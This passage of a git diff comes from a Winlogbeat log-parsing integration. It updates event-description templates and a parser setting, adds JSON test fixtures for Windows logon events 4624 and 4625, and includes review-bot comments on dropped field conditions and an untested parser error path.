"Microsoft-Windows-Sysmon" + }, + { + "field": "process.executable" + }, + { + "field": "host.name" + } + ] + }, + { + "value": "Process {process.executable} created by {user.domain}\\{user.name} on {host.name}", + "relationships": [ + { + "source": "user.name", + "target": "process.command_line", + "type": "executed" + }, + { + "source": "process.command_line", + "target": "host.name", + "type": "executed on" + }, + { + "source": "process.command_line", + "target": "process.executable", + "type": "uses executable" + }, + { + "source": 
"process.parent.command_line", + "target": "process.parent.name", + "type": "uses executable" + }, + { + "source": "process.parent.command_line", + "target": "host.name", + "type": "executed on" + }, + { + "source": "process.parent.command_line", + "target": "process.command_line", + "type": "started" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 1 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Sysmon" + }, + { + "field": "process.executable" + }, + { + "field": "user.domain" + }, + { + "field": "user.name" + }, + { + "field": "host.name" + } + ] + }, + { + "value": "Process {process.executable} changed the creation time of the file {file.name} on {host.name}", + "relationships": [ + { + "source": "process.executable", + "target": "file.name", + "type": "changed creation time of" + }, + { + "source": "process.executable", + "target": "host.name", + "type": "executed on" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 2 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Sysmon" + } + ] + }, + { + "value": "Network connection from {source.ip} to {destination.ip}:{destination.port} by {process.executable} on {host.name}", + "relationships": [ + { + "source": "source.ip", + "target": "destination.ip", + "type": "connected to" + } + ], + "conditions": [ + { + "field": "action.id", + "value": 3 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Sysmon" + } + ] + }, + { + "value": "{file.name} created by {process.executable} on {host.name}", + "conditions": [ + { + "field": "action.id", + "value": 11 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Sysmon" + } + ] + }, + { + "value": "Registry value {action.properties.TargetObject} created by {process.executable} on {log.hostname}", + "conditions": [ + { + "field": "action.id", + "value": 12 + }, + { + "field": "action.properties.MessEventType", + "value": "CreateValue" + }, + { + 
"field": "winlog.provider_name", + "value": "Microsoft-Windows-Sysmon" + } + ] + }, + { + "value": "Registry key {registry.key} set by {process.executable} on {host.name}", + "conditions": [ + { + "field": "action.id", + "value": 13 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Sysmon" + } + ] + }, + { + "value": "Sysmon configuration was updated on {host.name}", + "conditions": [ + { + "field": "action.id", + "value": 16 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Sysmon" + } + ] + }, + { + "value": "{host.name} performed a DNS query for name {dns.question.name} (status: {sysmon.dns.status})", + "conditions": [ + { + "field": "action.id", + "value": 22 + }, + { + "field": "winlog.provider_name", + "value": "Microsoft-Windows-Sysmon" + } + ] + }, + { + "value": "Auditing event on {winlog.computer_name}: {event.action}", + "conditions": [ + { + "field": "winlog.provider_guid", + "value": "{54849625-5478-4994-a5ba-3e3b0328c30d}" + } + ] + }, + { + "value": "Auditing event on {winlog.computer_name} for {winlog.SubjectUserSid}: {event.action}", + "conditions": [ + { + "field": "winlog.provider_guid", + "value": "{54849625-5478-4994-a5ba-3e3b0328c30d}" } ] }, @@ -43,9 +1640,6 @@ "field": "event.action", "value": "Filtering Platform Connection" }, - { - "field": "winlog.computer_name" - }, { "field": "winlog.event_data.SourceAddress" }, 
@@ -55,59 +1649,83 @@ ] }, { - "value": "Service Control Manager on {host.hostname}: {event.original}", + "value": "Filtering connection on {winlog.computer_name} from {winlog.event_data.SourceAddress}", "conditions": [ { "field": "winlog.provider_guid", - "value": "{555908d1-a6d7-4695-8e1e-26931d2012f4}" + "value": "{54849625-5478-4994-a5ba-3e3b0328c30d}" }, { - "field": "host.hostname" + "field": "event.action", + "value": "Filtering Platform Connection" }, { - "field": "event.original" + "field": "winlog.event_data.SourceAddress" } ] }, { - "value": "Sysmon {winlog.opcode} event on {winlog.computer_name}", + "value": "Filtering connection on {winlog.computer_name} to {winlog.event_data.DestAddress}", "conditions": [ { "field": "winlog.provider_guid", - "value": "{5770385f-c22a-43e0-bf4c-06f5698ffbd9}" + "value": "{54849625-5478-4994-a5ba-3e3b0328c30d}" }, { - "field": "winlog.opcode" + "field": "event.action", + "value": "Filtering Platform Connection" }, { - "field": "winlog.computer_name" + "field": "winlog.event_data.DestAddress" } ] }, { - "value": "Sysmon : no event on {winlog.computer_name}", + "value": "Filtering connection on {winlog.computer_name}", "conditions": [ { "field": "winlog.provider_guid", - "value": "{00000000-0000-0000-0000-000000000000}" + "value": "{54849625-5478-4994-a5ba-3e3b0328c30d}" }, { - "field": "winlog.computer_name" + "field": "event.action", + "value": "Filtering Platform Connection" } ] }, { - "value": "Security event : {event.action} on {winlog.computer_name}", + "value": "Service Control Manager on {host.hostname}: {event.original}", "conditions": [ { "field": "winlog.provider_guid", - "value": "{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}" - }, + "value": "{555908d1-a6d7-4695-8e1e-26931d2012f4}" + } + ] + }, + { + "value": "Sysmon {winlog.opcode} event on {winlog.computer_name}", + "conditions": [ { - "field": "event.action" - }, + "field": "winlog.provider_guid", + "value": "{5770385f-c22a-43e0-bf4c-06f5698ffbd9}" + } + ] + }, + 
{ + "value": "Sysmon : no event on {winlog.computer_name}", + "conditions": [ { - "field": "winlog.computer_name" + "field": "winlog.provider_guid", + "value": "{00000000-0000-0000-0000-000000000000}" + } + ] + }, + { + "value": "Security event : {event.action} on {winlog.computer_name}", + "conditions": [ + { + "field": "winlog.provider_guid", + "value": "{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}" } ] }, @@ -117,12 +1735,6 @@ { "field": "event.module", "value": "powershell" - }, - { - "field": "event.action" - }, - { - "field": "winlog.computer_name" } ] }, diff --git a/Beats/winlogbeat/ingest/parser.yml b/Beats/winlogbeat/ingest/parser.yml index 0ffc5dbf6..7f190c1ff 100644 --- a/Beats/winlogbeat/ingest/parser.yml +++ b/Beats/winlogbeat/ingest/parser.yml @@ -10,6 +10,7 @@ pipeline: external: name: kv.parse-kv properties: + raise_errors: false input_field: "{{json.event.winlog.event_data.Hashes}}" output_field: hash value_sep: "=" diff --git a/Beats/winlogbeat/tests/security_event_4624.json b/Beats/winlogbeat/tests/security_event_4624.json new file mode 100644 index 000000000..fe8a200a5 --- /dev/null +++ b/Beats/winlogbeat/tests/security_event_4624.json 
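Review bot: The rewritten entries `Service Control Manager on {host.hostname}: {event.original}`, `Sysmon {winlog.opcode} event on {winlog.computer_name}` and the three `Filtering connection on {winlog.computer_name} …` entries keep placeholders for `host.hostname`, `event.original`, `winlog.opcode` and `winlog.computer_name` but drop the conditions that required those fields, so each description is now selected by `winlog.provider_guid` (plus `event.action`) alone; the preceding `@@ -43,9` hunk removes the same `winlog.computer_name` guard. If the renderer substitutes a missing field with an empty string instead of falling through to the next entry, events lacking those fields will produce a description with a blank host or opcode. Unless the engine is known to skip an entry whose placeholder is absent, restore the presence conditions, e.g. `{ "field": "winlog.computer_name" }`, or make sure a placeholder-free fallback entry is ordered last. The enclosing array continues outside the hunk on both sides.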
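Review bot: `raise_errors: false` on the `kv.parse-kv` stage means a missing or malformed `winlog.event_data.Hashes` value now yields no `hash` output instead of failing the event, and nothing in this commit exercises that path: the three fixtures added here (4624, 4625, 4634) are Security-Auditing events with no `Hashes` field at all. The input is a Jinja-rendered string, so an absent field likely reaches the parser as an empty or literal placeholder string rather than as a missing input, which is presumably the case that used to raise. Whatever later stage reads `hash` (outside this hunk) must tolerate its absence, otherwise the failure has only moved downstream. Add a Sysmon process-creation fixture whose `Hashes` string is truncated or uses an unexpected separator and assert that the event is still emitted without the hash-derived fields.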
@@ -0,0 +1,145 @@ +{ + "input": { + "message": "{\"agent\":{\"version\":\"7.0.0\",\"hostname\":\"hostname\",\"id\":\"abcd1234-abcd-1234-ef56-abcdef123456\",\"ephemeral_id\":\"12345678-1234-5678-9012-123456789012\",\"type\":\"winlogbeat\"},\"host\":{\"hostname\":\"hostname\",\"os\":{\"version\":\"10.0\",\"build\":\"17763.6414\",\"family\":\"windows\",\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"platform\":\"windows\",\"name\":\"Windows Server 2019 Datacenter\"},\"id\":\"abcdefab-1234-5678-9012-abcdefabcdef\",\"name\":\"hostname\",\"architecture\":\"x86_64\"},\"type\":\"winlogbeat\",\"ecs\":{\"version\":\"1.0.0\"},\"event\":{\"created\":\"2024-11-12T08:41:07.164Z\",\"action\":\"Logon\",\"code\":4624,\"kind\":\"event\"},\"tags\":[\"beats_input_codec_plain_applied\"],\"winlog\":{\"keywords\":[\"Audit Success\"],\"api\":\"wineventlog\",\"version\":2,\"process\":{\"pid\":752,\"thread\":{\"id\":7960}},\"record_id\":1170100815,\"event_data\":{\"TargetLinkedLogonId\":\"0x0\",\"IpPort\":\"29051\",\"TargetOutboundUserName\":\"-\",\"ImpersonationLevel\":\"%%1833\",\"TargetDomainName\":\"DOMAIN\",\"TargetOutboundDomainName\":\"-\",\"IpAddress\":\"1.2.3.4\",\"LogonProcessName\":\"Process 
\",\"WorkstationName\":\"WS-USER-01\",\"LmPackageName\":\"-\",\"SubjectUserSid\":\"S-1-2-3\",\"ProcessId\":\"0x2f0\",\"VirtualAccount\":\"%%1843\",\"SubjectLogonId\":\"0x3e7\",\"KeyLength\":\"0\",\"RestrictedAdminMode\":\"-\",\"TargetUserSid\":\"S-4-5-6\",\"ElevatedToken\":\"%%1843\",\"SubjectUserName\":\"WS-USER-01$\",\"LogonGuid\":\"{00000000-0000-0000-0000-000000000000}\",\"TransmittedServices\":\"-\",\"LogonType\":\"3\",\"SubjectDomainName\":\"DOMAIN\",\"TargetUserName\":\"target_user\",\"ProcessName\":\"C:\\\\Windows\\\\System32\\\\executable.exe\",\"TargetLogonId\":\"0xfcebb74a\",\"AuthenticationPackageName\":\"MICROSOFT_AUTHENTICATION_PACKAGE_V1_0\"},\"event_id\":4624,\"computer_name\":\"hostname.company.com\",\"channel\":\"Security\",\"task\":\"Logon\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"opcode\":\"Info\"},\"log\":{\"level\":\"information\"},\"message\":\"An account was successfully logged on.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tWS-USER-01$\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x3E7\\n\\nLogon Information:\\n\\tLogon Type:\\t\\t3\\n\\tRestricted Admin Mode:\\t-\\n\\tVirtual Account:\\t\\tNo\\n\\tElevated Token:\\t\\tNo\\n\\nImpersonation Level:\\t\\tImpersonation\\n\\nNew Logon:\\n\\tSecurity ID:\\t\\tS-4-5-6\\n\\tAccount Name:\\t\\ttarget_user\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0xFCEBB74A\\n\\tLinked Logon ID:\\t\\t0x0\\n\\tNetwork Account Name:\\t-\\n\\tNetwork Account Domain:\\t-\\n\\tLogon GUID:\\t\\t{00000000-0000-0000-0000-000000000000}\\n\\nProcess Information:\\n\\tProcess ID:\\t\\t0x2f0\\n\\tProcess Name:\\t\\tC:\\\\Windows\\\\System32\\\\executable.exe\\n\\nNetwork Information:\\n\\tWorkstation Name:\\tWS-USER-01\\n\\tSource Network Address:\\t1.2.3.4\\n\\tSource Port:\\t\\t29051\\n\\nDetailed Authentication Information:\\n\\tLogon Process:\\t\\tProcess \\n\\tAuthentication 
Package:\\tMICROSOFT_AUTHENTICATION_PACKAGE_V1_0\\n\\tTransited Services:\\t-\\n\\tPackage Name (NTLM only):\\t-\\n\\tKey Length:\\t\\t0\\n\\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\\n\\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\\n\\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\\n\\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\\n\\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\\n\\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\\n\\nThe authentication information fields provide detailed information about this specific logon request.\\n\\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\\n\\t- Transited services indicate which intermediate services have participated in this logon request.\\n\\t- Package name indicates which sub-protocol was used among the NTLM protocols.\\n\\t- Key length indicates the length of the generated session key. 
This will be 0 if no session key was requested.\",\"@version\":\"1\",\"@timestamp\":\"2024-11-12T08:41:05.803Z\"}", + "sekoiaio": { + "intake": { + "dialect": "Elastic Winlogbeat", + "dialect_uuid": "c10307ea-5dd1-45c6-85aa-2a6a900df99b" + } + } + }, + "expected": { + "message": "{\"agent\":{\"version\":\"7.0.0\",\"hostname\":\"hostname\",\"id\":\"abcd1234-abcd-1234-ef56-abcdef123456\",\"ephemeral_id\":\"12345678-1234-5678-9012-123456789012\",\"type\":\"winlogbeat\"},\"host\":{\"hostname\":\"hostname\",\"os\":{\"version\":\"10.0\",\"build\":\"17763.6414\",\"family\":\"windows\",\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"platform\":\"windows\",\"name\":\"Windows Server 2019 Datacenter\"},\"id\":\"abcdefab-1234-5678-9012-abcdefabcdef\",\"name\":\"hostname\",\"architecture\":\"x86_64\"},\"type\":\"winlogbeat\",\"ecs\":{\"version\":\"1.0.0\"},\"event\":{\"created\":\"2024-11-12T08:41:07.164Z\",\"action\":\"Logon\",\"code\":4624,\"kind\":\"event\"},\"tags\":[\"beats_input_codec_plain_applied\"],\"winlog\":{\"keywords\":[\"Audit Success\"],\"api\":\"wineventlog\",\"version\":2,\"process\":{\"pid\":752,\"thread\":{\"id\":7960}},\"record_id\":1170100815,\"event_data\":{\"TargetLinkedLogonId\":\"0x0\",\"IpPort\":\"29051\",\"TargetOutboundUserName\":\"-\",\"ImpersonationLevel\":\"%%1833\",\"TargetDomainName\":\"DOMAIN\",\"TargetOutboundDomainName\":\"-\",\"IpAddress\":\"1.2.3.4\",\"LogonProcessName\":\"Process 
\",\"WorkstationName\":\"WS-USER-01\",\"LmPackageName\":\"-\",\"SubjectUserSid\":\"S-1-2-3\",\"ProcessId\":\"0x2f0\",\"VirtualAccount\":\"%%1843\",\"SubjectLogonId\":\"0x3e7\",\"KeyLength\":\"0\",\"RestrictedAdminMode\":\"-\",\"TargetUserSid\":\"S-4-5-6\",\"ElevatedToken\":\"%%1843\",\"SubjectUserName\":\"WS-USER-01$\",\"LogonGuid\":\"{00000000-0000-0000-0000-000000000000}\",\"TransmittedServices\":\"-\",\"LogonType\":\"3\",\"SubjectDomainName\":\"DOMAIN\",\"TargetUserName\":\"target_user\",\"ProcessName\":\"C:\\\\Windows\\\\System32\\\\executable.exe\",\"TargetLogonId\":\"0xfcebb74a\",\"AuthenticationPackageName\":\"MICROSOFT_AUTHENTICATION_PACKAGE_V1_0\"},\"event_id\":4624,\"computer_name\":\"hostname.company.com\",\"channel\":\"Security\",\"task\":\"Logon\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"opcode\":\"Info\"},\"log\":{\"level\":\"information\"},\"message\":\"An account was successfully logged on.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tWS-USER-01$\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x3E7\\n\\nLogon Information:\\n\\tLogon Type:\\t\\t3\\n\\tRestricted Admin Mode:\\t-\\n\\tVirtual Account:\\t\\tNo\\n\\tElevated Token:\\t\\tNo\\n\\nImpersonation Level:\\t\\tImpersonation\\n\\nNew Logon:\\n\\tSecurity ID:\\t\\tS-4-5-6\\n\\tAccount Name:\\t\\ttarget_user\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0xFCEBB74A\\n\\tLinked Logon ID:\\t\\t0x0\\n\\tNetwork Account Name:\\t-\\n\\tNetwork Account Domain:\\t-\\n\\tLogon GUID:\\t\\t{00000000-0000-0000-0000-000000000000}\\n\\nProcess Information:\\n\\tProcess ID:\\t\\t0x2f0\\n\\tProcess Name:\\t\\tC:\\\\Windows\\\\System32\\\\executable.exe\\n\\nNetwork Information:\\n\\tWorkstation Name:\\tWS-USER-01\\n\\tSource Network Address:\\t1.2.3.4\\n\\tSource Port:\\t\\t29051\\n\\nDetailed Authentication Information:\\n\\tLogon Process:\\t\\tProcess \\n\\tAuthentication 
Package:\\tMICROSOFT_AUTHENTICATION_PACKAGE_V1_0\\n\\tTransited Services:\\t-\\n\\tPackage Name (NTLM only):\\t-\\n\\tKey Length:\\t\\t0\\n\\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\\n\\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\\n\\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\\n\\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\\n\\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\\n\\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\\n\\nThe authentication information fields provide detailed information about this specific logon request.\\n\\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\\n\\t- Transited services indicate which intermediate services have participated in this logon request.\\n\\t- Package name indicates which sub-protocol was used among the NTLM protocols.\\n\\t- Key length indicates the length of the generated session key. 
This will be 0 if no session key was requested.\",\"@version\":\"1\",\"@timestamp\":\"2024-11-12T08:41:05.803Z\"}", + "event": { + "action": "authentication_network", + "category": [ + "authentication" + ], + "code": "4624", + "kind": "event", + "module": "security", + "original": "An account was successfully logged on.\n\nSubject:\n\tSecurity ID:\t\tS-1-2-3\n\tAccount Name:\t\tWS-USER-01$\n\tAccount Domain:\t\tDOMAIN\n\tLogon ID:\t\t0x3E7\n\nLogon Information:\n\tLogon Type:\t\t3\n\tRestricted Admin Mode:\t-\n\tVirtual Account:\t\tNo\n\tElevated Token:\t\tNo\n\nImpersonation Level:\t\tImpersonation\n\nNew Logon:\n\tSecurity ID:\t\tS-4-5-6\n\tAccount Name:\t\ttarget_user\n\tAccount Domain:\t\tDOMAIN\n\tLogon ID:\t\t0xFCEBB74A\n\tLinked Logon ID:\t\t0x0\n\tNetwork Account Name:\t-\n\tNetwork Account Domain:\t-\n\tLogon GUID:\t\t{00000000-0000-0000-0000-000000000000}\n\nProcess Information:\n\tProcess ID:\t\t0x2f0\n\tProcess Name:\t\tC:\\Windows\\System32\\executable.exe\n\nNetwork Information:\n\tWorkstation Name:\tWS-USER-01\n\tSource Network Address:\t1.2.3.4\n\tSource Port:\t\t29051\n\nDetailed Authentication Information:\n\tLogon Process:\t\tProcess \n\tAuthentication Package:\tMICROSOFT_AUTHENTICATION_PACKAGE_V1_0\n\tTransited Services:\t-\n\tPackage Name (NTLM only):\t-\n\tKey Length:\t\t0\n\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\n\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\n\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\n\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\n\nThe network fields indicate where a remote logon request originated. 
Workstation name is not always available and may be left blank in some cases.\n\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\n\nThe authentication information fields provide detailed information about this specific logon request.\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\n\t- Transited services indicate which intermediate services have participated in this logon request.\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.", + "type": [ + "start" + ] + }, + "@timestamp": "2024-11-12T08:41:05.803000Z", + "action": { + "id": 4624, + "outcome": "success", + "properties": { + "AuthenticationPackageName": "MICROSOFT_AUTHENTICATION_PACKAGE_V1_0", + "ElevatedToken": "%%1843", + "ImpersonationLevel": "%%1833", + "IpAddress": "1.2.3.4", + "IpPort": "29051", + "KeyLength": "0", + "LmPackageName": "-", + "LogonGuid": "{00000000-0000-0000-0000-000000000000}", + "LogonProcessName": "Process ", + "LogonType": "3", + "ProcessId": "0x2f0", + "ProcessName": "C:\\Windows\\System32\\executable.exe", + "RestrictedAdminMode": "-", + "SubjectDomainName": "DOMAIN", + "SubjectLogonId": "0x3e7", + "SubjectUserName": "WS-USER-01$", + "SubjectUserSid": "S-1-2-3", + "TargetDomainName": "DOMAIN", + "TargetLinkedLogonId": "0x0", + "TargetLogonId": "0xfcebb74a", + "TargetOutboundDomainName": "-", + "TargetOutboundUserName": "-", + "TargetUserName": "target_user", + "TargetUserSid": "S-4-5-6", + "TransmittedServices": "-", + "VirtualAccount": "%%1843", + "WorkstationName": "WS-USER-01" + } + }, + "agent": { + "ephemeral_id": "12345678-1234-5678-9012-123456789012", + "id": "abcd1234-abcd-1234-ef56-abcdef123456", + "type": "winlogbeat", + "version": "7.0.0" + }, + "client": { + "ip": "1.2.3.4" + }, + "host": { + "architecture": "x86_64", + 
"hostname": "hostname", + "id": "abcdefab-1234-5678-9012-abcdefabcdef", + "name": "hostname", + "os": { + "build": "17763.6414", + "family": "windows", + "kernel": "10.0.17763.6414 (WinBuild.160101.0800)", + "name": "Windows Server 2019 Datacenter", + "platform": "windows", + "version": "10.0" + } + }, + "log": { + "level": "information" + }, + "related": { + "hosts": [ + "hostname" + ] + }, + "sekoiaio": { + "authentication": { + "process": { + "name": "Process " + } + }, + "client": { + "name": "WS-USER-01", + "os": { + "type": "windows" + } + }, + "server": { + "name": "hostname", + "os": { + "type": "windows" + } + } + }, + "user": { + "id": "S-1-2-3", + "name": "WS-USER-01$", + "target": { + "domain": "DOMAIN", + "id": "S-4-5-6", + "name": "target_user" + } + }, + "winlog": { + "api": "wineventlog", + "channel": "Security", + "computer_name": "hostname.company.com", + "event_id": "4624", + "keywords": [ + "Audit Success" + ], + "logon": { + "id": "0x3e7", + "type": "Network" + }, + "opcode": "Info", + "process": { + "pid": 752, + "thread": { + "id": 7960 + } + }, + "provider_guid": "{54849625-5478-4994-a5ba-3e3b0328c30d}", + "provider_name": "Microsoft-Windows-Security-Auditing", + "record_id": "1170100815", + "task": "Logon", + "version": 2 + } + } +} \ No newline at end of file diff --git a/Beats/winlogbeat/tests/security_event_4625.json b/Beats/winlogbeat/tests/security_event_4625.json new file mode 100644 index 000000000..85bda7ac7 --- /dev/null +++ b/Beats/winlogbeat/tests/security_event_4625.json 
@@ -0,0 +1,193 @@ +{ + "input": { + "message": "{\"@timestamp\":\"2024-11-12T08:40:34.260Z\",\"event\":{\"action\":\"Logon\",\"outcome\":\"failure\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4625\",\"created\":\"2024-11-12T08:40:35.900Z\",\"kind\":\"event\",\"dataset\":\"system.security\"},\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"activity_id\":\"{12345678-ABCD-EFAB-CDEF-123456789012}\",\"keywords\":[\"Audit Failure\"],\"provider_guid\":\"{54849625-5478-4994-A5BA-3E3B0328C30D}\",\"channel\":\"Security\",\"task\":\"Logon\",\"process\":{\"pid\":824,\"thread\":{\"id\":28936}},\"event_data\":{\"SubjectUserSid\":\"S-1-2-3\",\"FailureReason\":\"%%2313\",\"IpPort\":\"-\",\"KeyLength\":\"0\",\"Status\":\"0xc000006d\",\"TargetUserSid\":\"S-1-0-0\",\"TransmittedServices\":\"-\",\"LogonType\":\"3\",\"IpAddress\":\"-\",\"LogonProcessName\":\"Channel\",\"SubjectLogonId\":\"0x3e7\",\"SubStatus\":\"0xc0000064\",\"WorkstationName\":\"WORKSTATION\",\"SubjectDomainName\":\"J_DOE\",\"ProcessName\":\"C:\\\\Windows\\\\System32\\\\executable.exe\",\"SubjectUserName\":\"WORKSTATION$\",\"LmPackageName\":\"-\",\"ProcessId\":\"0x338\",\"AuthenticationPackageName\":\"Kerberos\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"WORKSTATION.johndoe.com\",\"record_id\":2552812283,\"event_id\":\"4625\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"WORKSTATION\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\"},\"host\":{\"hostname\":\"hostname\",\"architecture\":\"x86_64\",\"id\":\"aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\",\"name\":\"hostn
ame\",\"mac\":[\"00-00-00-00-00-00-00-00\",\"11-11-11-11-11-11\",\"A0-B1-C2-D3-E4-F5\",\"AA-BB-CC-DD-EE-FF\"],\"os\":{\"kernel\":\"10.0.14393.7426 (rs1_release.240926-1524)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2016 Datacenter\",\"build\":\"14393.7428\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"fe80::1234:5678:90ab:cde\",\"5.6.7.8\",\"fe80::1111:2222:3333:4444\",\"4.3.2.1\",\"fe80::aaaa:bbbb:cccc:dddd\",\"1.2.3.4\",\"fe80::1234:abcd:ef\",\"fe80::abcd:1234:567\",\"fe80::a0b1:c2d:3e4\"]},\"tags\":[\"Windows\",\"beats_input_raw_event\"]}", + "sekoiaio": { + "intake": { + "dialect": "Elastic Winlogbeat", + "dialect_uuid": "c10307ea-5dd1-45c6-85aa-2a6a900df99b" + } + } + }, + "expected": { + "message": "{\"@timestamp\":\"2024-11-12T08:40:34.260Z\",\"event\":{\"action\":\"Logon\",\"outcome\":\"failure\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4625\",\"created\":\"2024-11-12T08:40:35.900Z\",\"kind\":\"event\",\"dataset\":\"system.security\"},\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"activity_id\":\"{12345678-ABCD-EFAB-CDEF-123456789012}\",\"keywords\":[\"Audit 
Failure\"],\"provider_guid\":\"{54849625-5478-4994-A5BA-3E3B0328C30D}\",\"channel\":\"Security\",\"task\":\"Logon\",\"process\":{\"pid\":824,\"thread\":{\"id\":28936}},\"event_data\":{\"SubjectUserSid\":\"S-1-2-3\",\"FailureReason\":\"%%2313\",\"IpPort\":\"-\",\"KeyLength\":\"0\",\"Status\":\"0xc000006d\",\"TargetUserSid\":\"S-1-0-0\",\"TransmittedServices\":\"-\",\"LogonType\":\"3\",\"IpAddress\":\"-\",\"LogonProcessName\":\"Channel\",\"SubjectLogonId\":\"0x3e7\",\"SubStatus\":\"0xc0000064\",\"WorkstationName\":\"WORKSTATION\",\"SubjectDomainName\":\"J_DOE\",\"ProcessName\":\"C:\\\\Windows\\\\System32\\\\executable.exe\",\"SubjectUserName\":\"WORKSTATION$\",\"LmPackageName\":\"-\",\"ProcessId\":\"0x338\",\"AuthenticationPackageName\":\"Kerberos\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"WORKSTATION.johndoe.com\",\"record_id\":2552812283,\"event_id\":\"4625\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"WORKSTATION\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\"},\"host\":{\"hostname\":\"hostname\",\"architecture\":\"x86_64\",\"id\":\"aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\",\"name\":\"hostname\",\"mac\":[\"00-00-00-00-00-00-00-00\",\"11-11-11-11-11-11\",\"A0-B1-C2-D3-E4-F5\",\"AA-BB-CC-DD-EE-FF\"],\"os\":{\"kernel\":\"10.0.14393.7426 (rs1_release.240926-1524)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2016 Datacenter\",\"build\":\"14393.7428\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"fe80::1234:5678:90ab:cde\",\"5.6.7.8\",\"fe80::1111:2222:3333:4444\",\"4.3.2.1\",\"fe80::aaaa:bbbb:cccc:dddd\",\"1.2.3.4\",\"fe80::1234:abcd:ef\",\"fe80::abcd:1234:567\",\"fe80::a0b1:c2d:3e4\"]},\"tags\":[\"Windows\",\"beats_input_raw_event\"]}", + "event": { + "action": "authentication_network", + "category": [ + "authentication" 
